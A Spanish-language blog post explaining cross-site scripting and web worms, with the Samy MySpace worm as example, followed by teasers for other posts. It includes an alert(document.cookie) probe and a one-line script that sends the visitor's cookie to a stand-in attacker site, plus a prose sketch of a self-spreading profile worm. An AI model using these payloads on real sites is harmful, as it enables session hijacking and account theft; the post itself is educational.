Que es un gusano web y cómo funciona

Antiguamente, los gusanos eran códigos maliciosos, preparados para extenderse rápidamente de sistema en sistema, mediante las redes p2p, el envío automatizado por correo, etc. Los gusanos eran programas informáticos, que al ejecutarlos, utilizaban tu ordenador para extenderse a muchos mas sistemas, sin que tu vieses absolutamente nada.

En la actualidad, con la extrema popularidad e importancia que tiene el mundo web, los gusanos han ido evolucionando, de forma que ha nacido un nuevo tipo de gusano, que no infecta tu ordenador, ni es un programa compilado que debes descargar, sino que es un pequeño fragmento de código javascript, que infecta tu perfil en alguna web.

Todo empezó con los agujeros de seguridad de tipo Cross Site Scripting (XSS), un tipo de agujero de seguridad, al que no se le presta tanta atención como a otros que a priori parecen mas peligrosos, como los Sql Injection, o similares, pero que es tanto o mas peligroso.

Pero para entender los web worms, debemos empezar desde muy al principio, desde las bases de los ataques tipo XSS. Un ataque XSS persigue, normalmente, robar la cookie del visitante. La cookie es una pequeña porción de información, que sirve para que la página web, recuerde que te has autenticado correctamente, y no te pida la contraseña cada vez que quieres hacer una acción.

Para robar la cookie, los ataques XSS se sirven de código javascript, ya que el código javascript se ejecuta en el navegador, tiene acceso a las cookies del mismo, sin embargo, por seguridad, un código javascript solo puede ver las cookies del sitio web que hospeda ese código javascript.

Es decir, si yo visito www.ejemplo.com, y esta web me envía un javascript que accede a las cookies, este javascript no podrá ver mis cookies de otras páginas web.

Y es en esa protección, en la que reside el peligro del Cross Site Scripting; imaginemos una página web que te pregunta tu nombre al entrar, tu lo introduces, y te muestra por pantalla: Hola! <nombreintroducido>. Si yo, en el nombre, introduzco:
<script>alert(document.cookie)</script>
Mi código javascript, podrá acceder a las cookies de esa página web, ya que el código javascript, el navegador, lo recibe a través de la web que me ha preguntado mi nombre.

¿Cual es el peligro real de todo esto?
Veamos un ejemplo ficticio, pero posible…Imaginemos que gmail tiene un error de seguridad, y permite introducir código javascript en el cuerpo de un mail, yo podría escribirte un mail que contubiese el siguiente código:
<script>document.location.href = ‘www.paginamaligna.com/recogercookie.php?cookie=’+document.cookie; </script>
Cuando tu abrieses el correo, el navegador te redirigiría hacía paginamaligna.com, pasándole por GET, tu cookie, a la cual hemos tenido acceso, ya que el javascript, para el navegador, procedía de gmail.
Una vez con tu cookie, borro mi cookie de gmail, y me pongo la tuya, ahora ya estoy autentificado en gmail, con tu nombre de usuario, y puedo leer tu correo.

Una vez entendido esto, entender los gusanos web (web worms) son fáciles de entender, imagina que yo estoy en una red social, y tengo un perfil público, en el cual hay un campo ‘intereses’, donde la gente pone lo que le gusta hacer. Si ese campo, permite introducir código HTML, sin filtrarlo, yo podría introducir:
<script>alert(document.cookie);</script>
Y cuando alguien visitase mi perfil, se mostrase su cookie. Si ahora en lugar de un alert, introduzco un código, que hace un petición POST a la red social, y modifica el perfil de la victima, introduciendo en el campo intereses, el mismo código malicioso que yo tengo, cada persona que entre, se le modificará automáticamente su perfil, y cada persona que vea ese perfil modificado, modificará automaticamente el suyo, y así sucesivamente.

En unas horas, todos los perfiles de una red social pueden estar modificados, es decir, infectados con el código.

Además, este código podría enviarle las cookies al autor original del código, mediante una petición invisible a alguna web (usando un iframe invisible, por ejemplo), de forma que no solo ha infectado todos los perfiles, sino que tiene todas las cookies, de todo el mundo, en la web.
Aunque todo esto suene rocambolesco, es una realidad, y ha sucedido ya en muchas ocasiones, siendo quizás la mas famosa, la de samy, un código javascript que infecto millones de perfiles en myspace, mediante un agujero de tipo XSS.

Como siempre, para protegerse de estos ataques, lo mejor es utilizar noscript, para firefox.
Via  rooibo.com

Entradas populares de este blog

El mejor software libre para tu Terminal de Punto de Venta (TPV/POS)

Imagen
Siempre damos tips para los usuarios de escritorio hogareños. No obstante, Linux y el software libre en general, también tienen mucho para aportar en el mundo de los negocios, especialmente de las PyMES . En este post, basado enteramente en la producción original de Redeyegt , te muestro algunas de las mejores herramientas libres para utilizar en tu terminal de punto de venta (TPV/POS) . ¿Qué es POS/TPV? POS,  por sus siglas en ingles significa "Point of Sale" (punto de venta).  TPV  en español significa "Terminal Punto de Venta". Entonces, un software para TPV es aquel con el que se llevan a cabo las transacciones e información de pago de los clientes en la compra/venta bienes, productos y servicios. Estos datos pueden ser obtenidos utilizando diferentes dispositivos. En nuestro caso será a través de una computadora, pero también se puede realizar a traves de cajas registradoras, escáner de código de barras, PIN pads y lectores de tarjetas. ¿
Leer más

Canaima 3 vs Windows 7: Una comparación detallada de ambos Sistemas Operativos

Imagen
Con el reciente lanzamiento de Canaima 3.0, decidí finalmente hacer la muy esperada, pedida y buscada comparación Canaima vs Windows. En esta oportunidad estaré haciendo una comparación lo más imparcial y objetiva posible, a pesar de ser yo un promotor del software libre y desarrollador de Canaima GNU/Linux. ¿Imagínense yo acá escribiendo mentiras, estudios poco serios y sesgados? Lo menos que van a hacer es confiar en mi, y por ende tampoco confiarán en lo que yo predico (el uso del Software Libre). A lo largo del estudio, encontrarán enlaces a imágenes que ilustran la evolución del proceso, así como también enlaces a otros contenidos que ampliarán la información que les estoy proporcionando. Dicho esto, empecemos! Ambiente de Pruebas Usaré un mismo entorno de pruebas para ambos sistemas operativos, y empezaré desde la instalación, hasta llegar a hacer pruebas de stress específicas. Para éste caso utilizaré un equipo de hardware reciente con las siguientes caracterís
Leer más

Cómo utilizar un USB como memoria RAM

Imagen
Con este truco informático vamos utilizar nuestra memoria USB como memoria RAM . ¿Es posible? Aprende cómo sacarle provecho a tu pendrive. ¿Su equipo tiene tan sólo 1 GB o 2 GB de RAM? no se preocupe por ello, con este tip informático usted podrá conseguir una memoria RAM de mayor capacidad . En este truco vamos a compartir algo muy interesante y útil para los que tienen poca cantidad de RAM en su ordenador. Es posible que usted tenga los recursos suficientes para comprarse una memoria RAM de mayor capacidad y no desee utilizar este truco, pero … este tip es muy divertido, así que vamos por ello. Cosa que debe saber: Cuanto mayor sea la RAM del ordenador, mayor será su velocidad de procesamiento , por ejemplo, si está trabajando en un navegador como Google Chrome, que es un “hambriento” del consumo de memoria RAM y también está intentando abrir un programa de diseño como Adobe Photoshop entonces su ordenador cargará el CS6 dentro de 2 segundos si tiene 8 GB de RAM. Ah
Leer más